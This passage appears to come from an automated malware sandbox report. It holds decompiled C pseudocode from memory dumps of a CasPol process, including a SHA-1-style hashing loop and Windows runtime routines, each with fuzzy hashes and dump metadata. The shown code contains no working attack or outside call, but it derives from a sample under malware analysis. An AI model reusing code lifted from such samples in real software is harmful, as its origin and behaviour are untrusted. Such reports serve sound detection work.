                                                                					_t479 = _v8;
                                                                					asm("ror eax, 0x2");
                                                                					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                                                					_t346 = _v12;
                                                                					_v16 = _t404;
                                                                					_v12 = _t525;
                                                                					asm("rol esi, 0x5");
                                                                					asm("ror ebx, 0x2");
                                                                					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                                                					_v16 = _t358;
                                                                					_t370 = _v12;
                                                                					_v12 = _t445;
                                                                					asm("rol edx, 0x5");
                                                                					_v16 = _t279;
                                                                					asm("ror ecx, 0x2");
                                                                					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                                                					_t404 = _v12;
                                                                					_v12 = _t303;
                                                                					asm("rol eax, 0x5");
                                                                					_v16 = _t346;
                                                                					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                                                					_t305 = _t370;
                                                                					_v8 = _t346;
                                                                					asm("ror edx, 0x2");
                                                                					_v8 = _t370;
                                                                					_t358 = _v12;
                                                                					_v12 = _t532;
                                                                					asm("rol esi, 0x5");
                                                                					_t478 = _t479 + 5;
                                                                					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                                                					_v16 = _t305;
                                                                					_t279 = _v12;
                                                                					asm("ror ecx, 0x2");
                                                                					_v8 = _t404;
                                                                					_v12 = _t499;
                                                                					_v8 = _t478;
                                                                				} while (_t478 < 0x50);
                                                                				_t480 = _a4;
                                                                				_t480[2] = _t480[2] + _t358;
                                                                				_t480[3] = _t480[3] + _t404;
                                                                				_t311 = _t480[4] + _v16;
                                                                				 *_t480 =  *_t480 + _t499;
                                                                				_t480[1] = _t480[1] + _t279;
                                                                				_t480[4] = _t311;
                                                                				_t480[0x17] = 0;
                                                                				return _t311;
                                                                			}

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (
                                                                • API String ID: 0-3887548279
                                                                • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                • Instruction ID: cf0ae680082bb92ded5da439ca895811eadb995fb834007ffe077b633fc3d0ec
                                                                • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                • Instruction Fuzzy Hash: 85021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 78%
                                                                			E0162B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                				signed int _t65;
                                                                				signed short _t69;
                                                                				intOrPtr _t70;
                                                                				signed short _t85;
                                                                				void* _t86;
                                                                				signed short _t89;
                                                                				signed short _t91;
                                                                				intOrPtr _t92;
                                                                				intOrPtr _t97;
                                                                				intOrPtr* _t98;
                                                                				signed short _t99;
                                                                				signed short _t101;
                                                                				void* _t102;
                                                                				char* _t103;
                                                                				signed short _t104;
                                                                				intOrPtr* _t110;
                                                                				void* _t111;
                                                                				void* _t114;
                                                                				intOrPtr* _t115;
                                                                
                                                                				_t109 = __esi;
                                                                				_t108 = __edi;
                                                                				_t106 = __edx;
                                                                				_t95 = __ebx;
                                                                				_push(0x90);
                                                                				_push(0x16ff7a8);
                                                                				E0167D0E8(__ebx, __edi, __esi);
                                                                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                				if(__edx == 0xffffffff) {
                                                                					L6:
                                                                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                					__eflags = _t65 & 0x00000002;
                                                                					if((_t65 & 0x00000002) != 0) {
                                                                						L3:
                                                                						L4:
                                                                						return E0167D130(_t95, _t108, _t109);
                                                                					}
                                                                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                					_t108 = 0;
                                                                					_t109 = 0;
                                                                					_t95 = 0;
                                                                					__eflags = 0;
                                                                					while(1) {
                                                                						__eflags = _t95 - 0x200;
                                                                						if(_t95 >= 0x200) {
                                                                							break;
                                                                						}
                                                                						E0166D000(0x80);
                                                                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                						_t108 = _t115;
                                                                						_t95 = _t95 - 0xffffff80;
                                                                						_t17 = _t114 - 4;
                                                                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                						__eflags =  *_t17;
                                                                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                						_t102 = _t110 + 1;
                                                                						do {
                                                                							_t85 =  *_t110;
                                                                							_t110 = _t110 + 1;
                                                                							__eflags = _t85;
                                                                						} while (_t85 != 0);
                                                                						_t111 = _t110 - _t102;
                                                                						_t21 = _t95 - 1; // -129
                                                                						_t86 = _t21;
                                                                						__eflags = _t111 - _t86;
                                                                						if(_t111 > _t86) {
                                                                							_t111 = _t86;
                                                                						}
                                                                						E0166F3E0(_t108, _t106, _t111);
                                                                						_t115 = _t115 + 0xc;
                                                                						_t103 = _t111 + _t108;
                                                                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                						_t89 = _t95 - _t111;
                                                                						__eflags = _t89;
                                                                						_push(0);
                                                                						if(_t89 == 0) {
                                                                							L15:
                                                                							_t109 = 0xc000000d;
                                                                							goto L16;
                                                                						} else {
                                                                							__eflags = _t89 - 0x7fffffff;
                                                                							if(_t89 <= 0x7fffffff) {
                                                                								L16:
                                                                								 *(_t114 - 0x94) = _t109;
                                                                								__eflags = _t109;
                                                                								if(_t109 < 0) {
                                                                									__eflags = _t89;
                                                                									if(_t89 != 0) {
                                                                										 *_t103 = 0;
                                                                									}
                                                                									L26:
                                                                									 *(_t114 - 0xa0) = _t109;
                                                                									 *(_t114 - 4) = 0xfffffffe;
                                                                									__eflags = _t109;
                                                                									if(_t109 >= 0) {
                                                                										L31:
                                                                										_t98 = _t108;
                                                                										_t39 = _t98 + 1; // 0x1
                                                                										_t106 = _t39;
                                                                										do {
                                                                											_t69 =  *_t98;
                                                                											_t98 = _t98 + 1;
                                                                											__eflags = _t69;
                                                                										} while (_t69 != 0);
                                                                										_t99 = _t98 - _t106;
                                                                										__eflags = _t99;
                                                                										L34:
                                                                										_t70 =  *[fs:0x30];
                                                                										__eflags =  *((char*)(_t70 + 2));
                                                                										if( *((char*)(_t70 + 2)) != 0) {
                                                                											L40:
                                                                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                											 *(_t114 - 4) = 1;
                                                                											_push(_t114 - 0x74);
                                                                											L0167DEF0(_t99, _t106);
                                                                											 *(_t114 - 4) = 0xfffffffe;
                                                                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                											goto L3;
                                                                										}
                                                                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                											goto L40;
                                                                										}
                                                                										_push( *((intOrPtr*)(_t114 + 8)));
                                                                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                										_push(_t99 & 0x0000ffff);
                                                                										_push(_t108);
                                                                										_push(1);
                                                                										_t101 = E0166B280();
                                                                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                											__eflags = _t101 - 0x80000003;
                                                                											if(_t101 == 0x80000003) {
                                                                												E0166B7E0(1);
                                                                												_t101 = 0;
                                                                												__eflags = 0;
                                                                											}
                                                                										}
                                                                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                										goto L4;
                                                                									}
                                                                									__eflags = _t109 - 0x80000005;
                                                                									if(_t109 == 0x80000005) {
                                                                										continue;
                                                                									}
                                                                									break;
                                                                								}
                                                                								 *(_t114 - 0x90) = 0;
                                                                								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                								_t91 = E0166E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                								_t115 = _t115 + 0x10;
                                                                								_t104 = _t91;
                                                                								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                								__eflags = _t104;
                                                                								if(_t104 < 0) {
                                                                									L21:
                                                                									_t109 = 0x80000005;
                                                                									 *(_t114 - 0x90) = 0x80000005;
                                                                									L22:
                                                                									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                									L23:
                                                                									 *(_t114 - 0x94) = _t109;
                                                                									goto L26;
                                                                								}
                                                                								__eflags = _t104 - _t92;
                                                                								if(__eflags > 0) {
                                                                									goto L21;
                                                                								}
                                                                								if(__eflags == 0) {
                                                                									goto L22;
                                                                								}
                                                                								goto L23;
                                                                							}
                                                                							goto L15;
                                                                						}
                                                                					}
                                                                					__eflags = _t109;
                                                                					if(_t109 >= 0) {
                                                                						goto L31;
                                                                					}
                                                                					__eflags = _t109 - 0x80000005;
                                                                					if(_t109 != 0x80000005) {
                                                                						goto L31;
                                                                					}
                                                                					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                					_t38 = _t95 - 1; // -129
                                                                					_t99 = _t38;
                                                                					goto L34;
                                                                				}
                                                                				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                					__eflags = __edx - 0x65;
                                                                					if(__edx != 0x65) {
                                                                						goto L2;
                                                                					}
                                                                					goto L6;
                                                                				}
                                                                				L2:
                                                                				_push( *((intOrPtr*)(_t114 + 8)));
                                                                				_push(_t106);
                                                                				if(E0166A890() != 0) {
                                                                					goto L6;
                                                                				}
                                                                				goto L3;
                                                                			}























                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: _vswprintf_s
                                                                • String ID:
                                                                • API String ID: 677850445-0
                                                                • Opcode ID: a83c2ff30b5d141fc5b6349bc8294aae6a40a976bf7cbb982bdac26927e09299
                                                                • Instruction ID: 8f74e3fa7af2f58e988d35bf9dcbcaa4d2c2fd370ead91ea9d8f653130d9295d
                                                                • Opcode Fuzzy Hash: a83c2ff30b5d141fc5b6349bc8294aae6a40a976bf7cbb982bdac26927e09299
                                                                • Instruction Fuzzy Hash: 7F51B371D1025A8ADF31EF68CC44BAEBBB1AF04710F1142ADD859AB382DB718945CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 76%
                                                                			E0164B944(signed int* __ecx, char __edx) {
                                                                				signed int _v8;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				char _v28;
                                                                				signed int _v32;
                                                                				char _v36;
                                                                				signed int _v40;
                                                                				intOrPtr _v44;
                                                                				signed int* _v48;
                                                                				signed int _v52;
                                                                				signed int _v56;
                                                                				intOrPtr _v60;
                                                                				intOrPtr _v64;
                                                                				intOrPtr _v68;
                                                                				intOrPtr _v72;
                                                                				intOrPtr _v76;
                                                                				char _v77;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				intOrPtr* _t65;
                                                                				intOrPtr _t67;
                                                                				intOrPtr _t68;
                                                                				char* _t73;
                                                                				intOrPtr _t77;
                                                                				intOrPtr _t78;
                                                                				signed int _t82;
                                                                				intOrPtr _t83;
                                                                				void* _t87;
                                                                				char _t88;
                                                                				intOrPtr* _t89;
                                                                				intOrPtr _t91;
                                                                				void* _t97;
                                                                				intOrPtr _t100;
                                                                				void* _t102;
                                                                				void* _t107;
                                                                				signed int _t108;
                                                                				intOrPtr* _t112;
                                                                				void* _t113;
                                                                				intOrPtr* _t114;
                                                                				intOrPtr _t115;
                                                                				intOrPtr _t116;
                                                                				intOrPtr _t117;
                                                                				signed int _t118;
                                                                				void* _t130;
                                                                
                                                                				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                				_v8 =  *0x171d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                				_t112 = __ecx;
                                                                				_v77 = __edx;
                                                                				_v48 = __ecx;
                                                                				_v28 = 0;
                                                                				_t5 = _t112 + 0xc; // 0x575651ff
                                                                				_t105 =  *_t5;
                                                                				_v20 = 0;
                                                                				_v16 = 0;
                                                                				if(_t105 == 0) {
                                                                					_t50 = _t112 + 4; // 0x5de58b5b
                                                                					_t60 =  *__ecx |  *_t50;
                                                                					if(( *__ecx |  *_t50) != 0) {
                                                                						 *__ecx = 0;
                                                                						__ecx[1] = 0;
                                                                						if(E01647D50() != 0) {
                                                                							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                						} else {
                                                                							_t65 = 0x7ffe0386;
                                                                						}
                                                                						if( *_t65 != 0) {
                                                                							E016F8CD6(_t112);
                                                                						}
                                                                						_push(0);
                                                                						_t52 = _t112 + 0x10; // 0x778df98b
                                                                						_push( *_t52);
                                                                						_t60 = E01669E20();
                                                                					}
                                                                					L20:
                                                                					_pop(_t107);
                                                                					_pop(_t113);
                                                                					_pop(_t87);
                                                                					return E0166B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                				}
                                                                				_t8 = _t112 + 8; // 0x8b000cc2
                                                                				_t67 =  *_t8;
                                                                				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                				_t108 =  *(_t67 + 0x14);
                                                                				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                				_t105 = 0x2710;
                                                                				asm("sbb eax, edi");
                                                                				_v44 = _t88;
                                                                				_v52 = _t108;
                                                                				_t60 = E0166CE00(_t97, _t68, 0x2710, 0);
                                                                				_v56 = _t60;
                                                                				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                					L3:
                                                                					 *(_t112 + 0x44) = _t60;
                                                                					_t105 = _t60 * 0x2710 >> 0x20;
                                                                					 *_t112 = _t88;
                                                                					 *(_t112 + 4) = _t108;
                                                                					_v20 = _t60 * 0x2710;
                                                                					_v16 = _t60 * 0x2710 >> 0x20;
                                                                					if(_v77 != 0) {
                                                                						L16:
                                                                						_v36 = _t88;
                                                                						_v32 = _t108;
                                                                						if(E01647D50() != 0) {
                                                                							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                						} else {
                                                                							_t73 = 0x7ffe0386;
                                                                						}
                                                                						if( *_t73 != 0) {
                                                                							_t105 = _v40;
                                                                							E016F8F6A(_t112, _v40, _t88, _t108);
                                                                						}
                                                                						_push( &_v28);
                                                                						_push(0);
                                                                						_push( &_v36);
                                                                						_t48 = _t112 + 0x10; // 0x778df98b
                                                                						_push( *_t48);
                                                                						_t60 = E0166AF60();
                                                                						goto L20;
                                                                					} else {
                                                                						_t89 = 0x7ffe03b0;
                                                                						do {
                                                                							_t114 = 0x7ffe0010;
                                                                							do {
                                                                								_t77 =  *0x1718628; // 0x0
                                                                								_v68 = _t77;
                                                                								_t78 =  *0x171862c; // 0x0
                                                                								_v64 = _t78;
                                                                								_v72 =  *_t89;
                                                                								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                								while(1) {
                                                                									_t105 =  *0x7ffe000c;
                                                                									_t100 =  *0x7ffe0008;
                                                                									if(_t105 ==  *_t114) {
                                                                										goto L8;
                                                                									}
                                                                									asm("pause");
                                                                								}
                                                                								L8:
                                                                								_t89 = 0x7ffe03b0;
                                                                								_t115 =  *0x7ffe03b0;
                                                                								_t82 =  *0x7FFE03B4;
                                                                								_v60 = _t115;
                                                                								_t114 = 0x7ffe0010;
                                                                								_v56 = _t82;
                                                                							} while (_v72 != _t115 || _v76 != _t82);
                                                                							_t83 =  *0x1718628; // 0x0
                                                                							_t116 =  *0x171862c; // 0x0
                                                                							_v76 = _t116;
                                                                							_t117 = _v68;
                                                                						} while (_t117 != _t83 || _v64 != _v76);
                                                                						asm("sbb edx, [esp+0x24]");
                                                                						_t102 = _t100 - _v60 - _t117;
                                                                						_t112 = _v48;
                                                                						_t91 = _v44;
                                                                						asm("sbb edx, eax");
                                                                						_t130 = _t105 - _v52;
                                                                						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                							_t88 = _t102 - _t91;
                                                                							asm("sbb edx, edi");
                                                                							_t108 = _t105;
                                                                						} else {
                                                                							_t88 = 0;
                                                                							_t108 = 0;
                                                                						}
                                                                						goto L16;
                                                                					}
                                                                				} else {
                                                                					if( *(_t112 + 0x44) == _t60) {
                                                                						goto L20;
                                                                					}
                                                                					goto L3;
                                                                				}
                                                                			}

















































                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0164B9A5
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 885266447-0
                                                                • Opcode ID: f0c4c707dae90d387b0e92b134bd83a732f42ee7480609525f461d05ca6431f6
                                                                • Instruction ID: 5b457fb3411fa6874a1398c9b420879bef3c9887100fa8fde3fa73108218fd0a
                                                                • Opcode Fuzzy Hash: f0c4c707dae90d387b0e92b134bd83a732f42ee7480609525f461d05ca6431f6
                                                                • Instruction Fuzzy Hash: 83515B71A08341CFC720CF6DC88092ABBFAFB88650F14896EFA9597355D771E844CB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 84%
                                                                			E01652581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                				intOrPtr _v3;
                                                                				signed int _v8;
                                                                				signed int _v16;
                                                                				unsigned int _v24;
                                                                				void* _v28;
                                                                				signed int _v32;
                                                                				unsigned int _v36;
                                                                				void* _v37;
                                                                				signed int _v40;
                                                                				signed int _v44;
                                                                				signed int _v48;
                                                                				signed int _v52;
                                                                				signed int _v56;
                                                                				intOrPtr _v60;
                                                                				signed int _v64;
                                                                				signed int _v68;
                                                                				signed int _v72;
                                                                				signed int _v76;
                                                                				signed int _v80;
                                                                				signed int _t231;
                                                                				signed int _t235;
                                                                				void* _t236;
                                                                				signed int _t238;
                                                                				signed int _t245;
                                                                				signed int _t247;
                                                                				intOrPtr _t249;
                                                                				signed int _t252;
                                                                				signed int _t259;
                                                                				signed int _t262;
                                                                				signed int _t270;
                                                                				intOrPtr _t276;
                                                                				signed int _t278;
                                                                				signed int _t280;
                                                                				void* _t281;
                                                                				void* _t282;
                                                                				signed int _t283;
                                                                				unsigned int _t286;
                                                                				signed int _t290;
                                                                				signed int* _t291;
                                                                				signed int _t292;
                                                                				signed int _t296;
                                                                				intOrPtr _t308;
                                                                				signed int _t317;
                                                                				signed int _t319;
                                                                				signed int _t320;
                                                                				signed int _t324;
                                                                				signed int _t325;
                                                                				void* _t328;
                                                                				signed int _t329;
                                                                				signed int _t331;
                                                                				signed int _t334;
                                                                				void* _t335;
                                                                				void* _t337;
                                                                
                                                                				_t331 = _t334;
                                                                				_t335 = _t334 - 0x4c;
                                                                				_v8 =  *0x171d360 ^ _t331;
                                                                				_push(__ebx);
                                                                				_push(__esi);
                                                                				_push(__edi);
                                                                				_t324 = 0x171b2e8;
                                                                				_v56 = _a4;
                                                                				_v48 = __edx;
                                                                				_v60 = __ecx;
                                                                				_t286 = 0;
                                                                				_v80 = 0;
                                                                				asm("movsd");
                                                                				_v64 = 0;
                                                                				_v76 = 0;
                                                                				_v72 = 0;
                                                                				asm("movsd");
                                                                				_v44 = 0;
                                                                				_v52 = 0;
                                                                				_v68 = 0;
                                                                				asm("movsd");
                                                                				_v32 = 0;
                                                                				_v36 = 0;
                                                                				asm("movsd");
                                                                				_v16 = 0;
                                                                				_t337 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                                				_t276 = 0x48;
                                                                				_t306 = 0 | _t337 == 0x00000000;
                                                                				_t317 = 0;
                                                                				_v37 = _t337 == 0;
                                                                				if(_v48 <= 0) {
                                                                					L16:
                                                                					_t45 = _t276 - 0x48; // 0x0
                                                                					__eflags = _t45 - 0xfffe;
                                                                					if(_t45 > 0xfffe) {
                                                                						_t325 = 0xc0000106;
                                                                						goto L32;
                                                                					} else {
                                                                						_t324 = L01644620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
                                                                						_v52 = _t324;
                                                                						__eflags = _t324;
                                                                						if(_t324 == 0) {
                                                                							_t325 = 0xc0000017;
                                                                							goto L32;
                                                                						} else {
                                                                							 *(_t324 + 0x44) =  *(_t324 + 0x44) & 0x00000000;
                                                                							_t50 = _t324 + 0x48; // 0x48
                                                                							_t319 = _t50;
                                                                							_t306 = _v32;
                                                                							 *((intOrPtr*)(_t324 + 0x3c)) = _t276;
                                                                							_t278 = 0;
                                                                							 *((short*)(_t324 + 0x30)) = _v48;
                                                                							__eflags = _t306;
                                                                							if(_t306 != 0) {
                                                                								 *(_t324 + 0x18) = _t319;
                                                                								__eflags = _t306 - 0x1718478;
                                                                								 *_t324 = ((0 | _t306 == 0x01718478) - 0x00000001 & 0xfffffffb) + 7;
                                                                								E0166F3E0(_t319,  *((intOrPtr*)(_t306 + 4)),  *_t306 & 0x0000ffff);
                                                                								_t306 = _v32;
                                                                								_t335 = _t335 + 0xc;
                                                                								_t278 = 1;
                                                                								__eflags = _a8;
                                                                								_t319 = _t319 + (( *_t306 & 0x0000ffff) >> 1) * 2;
                                                                								if(_a8 != 0) {
                                                                									_t270 = E016B39F2(_t319);
                                                                									_t306 = _v32;
                                                                									_t319 = _t270;
                                                                								}
                                                                							}
                                                                							_t290 = 0;
                                                                							_v16 = 0;
                                                                							__eflags = _v48;
                                                                							if(_v48 <= 0) {
                                                                								L31:
                                                                								_t325 = _v68;
                                                                								__eflags = 0;
                                                                								 *((short*)(_t319 - 2)) = 0;
                                                                								goto L32;
                                                                							} else {
                                                                								_t280 = _t324 + _t278 * 4;
                                                                								_v56 = _t280;
                                                                								do {
                                                                									__eflags = _t306;
                                                                									if(_t306 != 0) {
                                                                										_t231 =  *(_v60 + _t290 * 4);
                                                                										__eflags = _t231;
                                                                										if(_t231 == 0) {
                                                                											goto L30;
                                                                										} else {
                                                                											__eflags = _t231 == 5;
                                                                											if(_t231 == 5) {
                                                                												goto L30;
                                                                											} else {
                                                                												goto L22;
                                                                											}
                                                                										}
                                                                									} else {
                                                                										L22:
                                                                										 *_t280 =  *(_v60 + _t290 * 4);
                                                                										 *(_t280 + 0x18) = _t319;
                                                                										_t235 =  *(_v60 + _t290 * 4);
                                                                										__eflags = _t235 - 8;
                                                                										if(_t235 > 8) {
                                                                											goto L56;
                                                                										} else {
                                                                											switch( *((intOrPtr*)(_t235 * 4 +  &M01652959))) {
                                                                												case 0:
                                                                													__ax =  *0x1718488;
                                                                													__eflags = __ax;
                                                                													if(__ax == 0) {
                                                                														goto L29;
                                                                													} else {
                                                                														__ax & 0x0000ffff = E0166F3E0(__edi,  *0x171848c, __ax & 0x0000ffff);
                                                                														__eax =  *0x1718488 & 0x0000ffff;
                                                                														goto L26;
                                                                													}
                                                                													goto L108;
                                                                												case 1:
                                                                													L45:
                                                                													E0166F3E0(_t319, _v80, _v64);
                                                                													_t265 = _v64;
                                                                													goto L26;
                                                                												case 2:
                                                                													 *0x1718480 & 0x0000ffff = E0166F3E0(__edi,  *0x1718484,  *0x1718480 & 0x0000ffff);
                                                                													__eax =  *0x1718480 & 0x0000ffff;
                                                                													__eax = ( *0x1718480 & 0x0000ffff) >> 1;
                                                                													__edi = __edi + __eax * 2;
                                                                													goto L28;
                                                                												case 3:
                                                                													__eax = _v44;
                                                                													__eflags = __eax;
                                                                													if(__eax == 0) {
                                                                														goto L29;
                                                                													} else {
                                                                														__esi = __eax + __eax;
                                                                														__eax = E0166F3E0(__edi, _v72, __esi);
                                                                														__edi = __edi + __esi;
                                                                														__esi = _v52;
                                                                														goto L27;
                                                                													}
                                                                													goto L108;
                                                                												case 4:
                                                                													_push(0x2e);
                                                                													_pop(__eax);
                                                                													 *(__esi + 0x44) = __edi;
                                                                													 *__edi = __ax;
                                                                													__edi = __edi + 4;
                                                                													_push(0x3b);
                                                                													_pop(__eax);
                                                                													 *(__edi - 2) = __ax;
                                                                													goto L29;
                                                                												case 5:
                                                                													__eflags = _v36;
                                                                													if(_v36 == 0) {
                                                                														goto L45;
                                                                													} else {
                                                                														E0166F3E0(_t319, _v76, _v36);
                                                                														_t265 = _v36;
                                                                													}
                                                                													L26:
                                                                													_t335 = _t335 + 0xc;
                                                                													_t319 = _t319 + (_t265 >> 1) * 2 + 2;
                                                                													__eflags = _t319;
                                                                													L27:
                                                                													_push(0x3b);
                                                                													_pop(_t267);
                                                                													 *((short*)(_t319 - 2)) = _t267;
                                                                													goto L28;
                                                                												case 6:
                                                                													__ebx =  *0x171575c;
                                                                													__eflags = __ebx - 0x171575c;
                                                                													if(__ebx != 0x171575c) {
                                                                														_push(0x3b);
                                                                														_pop(__esi);
                                                                														do {
                                                                															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                															E0166F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                															__edi = __edi + __eax * 2;
                                                                															__edi = __edi + 2;
                                                                															 *(__edi - 2) = __si;
                                                                															__ebx =  *__ebx;
                                                                															__eflags = __ebx - 0x171575c;
                                                                														} while (__ebx != 0x171575c);
                                                                														__esi = _v52;
                                                                														__ecx = _v16;
                                                                														__edx = _v32;
                                                                													}
                                                                													__ebx = _v56;
                                                                													goto L29;
                                                                												case 7:
                                                                													 *0x1718478 & 0x0000ffff = E0166F3E0(__edi,  *0x171847c,  *0x1718478 & 0x0000ffff);
                                                                													__eax =  *0x1718478 & 0x0000ffff;
                                                                													__eax = ( *0x1718478 & 0x0000ffff) >> 1;
                                                                													__eflags = _a8;
                                                                													__edi = __edi + __eax * 2;
                                                                													if(_a8 != 0) {
                                                                														__ecx = __edi;
                                                                														__eax = E016B39F2(__ecx);
                                                                														__edi = __eax;
                                                                													}
                                                                													goto L28;
                                                                												case 8:
                                                                													__eax = 0;
                                                                													 *(__edi - 2) = __ax;
                                                                													 *0x1716e58 & 0x0000ffff = E0166F3E0(__edi,  *0x1716e5c,  *0x1716e58 & 0x0000ffff);
                                                                													 *(__esi + 0x38) = __edi;
                                                                													__eax =  *0x1716e58 & 0x0000ffff;
                                                                													__eax = ( *0x1716e58 & 0x0000ffff) >> 1;
                                                                													__edi = __edi + __eax * 2;
                                                                													__edi = __edi + 2;
                                                                													L28:
                                                                													_t290 = _v16;
                                                                													_t306 = _v32;
                                                                													L29:
                                                                													_t280 = _t280 + 4;
                                                                													__eflags = _t280;
                                                                													_v56 = _t280;
                                                                													goto L30;
                                                                											}
                                                                										}
                                                                									}
                                                                									goto L108;
                                                                									L30:
                                                                									_t290 = _t290 + 1;
                                                                									_v16 = _t290;
                                                                									__eflags = _t290 - _v48;
                                                                								} while (_t290 < _v48);
                                                                								goto L31;
                                                                							}
                                                                						}
                                                                					}
                                                                				} else {
                                                                					while(1) {
                                                                						L1:
                                                                						_t235 =  *(_v60 + _t317 * 4);
                                                                						if(_t235 > 8) {
                                                                							break;
                                                                						}
                                                                						switch( *((intOrPtr*)(_t235 * 4 +  &M01652935))) {
                                                                							case 0:
                                                                								__ax =  *0x1718488;
                                                                								__eflags = __ax;
                                                                								if(__ax != 0) {
                                                                									__eax = __ax & 0x0000ffff;
